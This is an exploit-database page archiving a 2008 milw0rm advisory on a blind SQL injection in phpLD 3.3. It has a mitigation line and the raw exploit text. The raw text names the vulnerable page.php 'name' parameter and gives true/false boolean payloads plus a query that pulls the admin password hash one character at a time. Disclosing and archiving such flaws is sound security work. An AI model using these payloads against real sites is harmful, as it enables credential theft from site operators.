header-logo
Suggest Exploit
vendor:
phpLD
by:
milw0rm.com
7.5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: phpLD
Affected Version From: 3.3
Affected Version To: 3.3
Patch Exists: YES
Related CWE: N/A
CPE: a:phplinkdirectory:phpld
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

phpLD 3.3 Blind SQL Injection

A Blind SQL Injection vulnerability exists in phpLD 3.3 when magic_quotes_gpc is set to Off and register_globals is set to On. An attacker can exploit this vulnerability by sending a specially crafted request to the page.php file with the 'name' parameter. The attacker can then use a series of True and False requests to extract data from the database. For example, an attacker can use the following request to extract the first character of the password from the PLD_USER table: (validpagename)' or ORD(MID((SELECT PASSWORD FROM PLD_USER WHERE ID = 1),1,1))>1#

Mitigation:

Ensure that magic_quotes_gpc is set to On and register_globals is set to Off.
Source

Exploit-DB raw data:

phpLD 3.3 Blind SQL Injection
http://www.phplinkdirectory.com/

magic_quotes_gpc = Off
register_globals = On

Vulnerable:
GET http://site/phpld/page.php?name=

True Request:
(validpagename)' or 1=1#

False Request:
(validpagename)' or 1=0#

Try this (urlencode):
(validpagename)' or ORD(MID((SELECT PASSWORD FROM PLD_USER WHERE ID = 1),1,1))>1# etc...

Field value example:
{sha1}dd94709528bb1c83d08f3088d4043f4742891f4f


- Seasons Greetings -
- http://nukeit.org -

# milw0rm.com [2008-12-23]

Navigation

Suggest Exploit

Services By CQR